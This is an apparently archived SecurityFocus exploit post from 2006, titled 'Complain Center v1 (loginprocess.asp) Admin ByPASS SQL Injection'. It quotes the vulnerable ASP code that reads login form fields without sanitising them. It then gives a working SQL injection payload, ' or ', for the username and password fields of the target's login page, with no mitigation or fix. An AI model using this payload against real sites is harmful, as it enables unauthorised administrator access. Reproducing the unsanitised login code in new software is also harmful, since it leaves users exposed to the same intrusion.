Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection Sep 14 2006 08:02PM
ajannhwt hotmail com
ENGLISH

# Title : Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

# Author : ajann

# Exploit;

[CODE]

loginprocess.asp:

..

...

dim varUser

dim varPass

varUser=Request.Form("TxtUser") No Secure : )

varPass=Request.Form("TxtPass") No Secure : )

..

...

//Before join login page

http://[target]/[path]/login.asp

Username : ' or '

Password : ' or ' and Login Ok

# ajann,Turkey

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus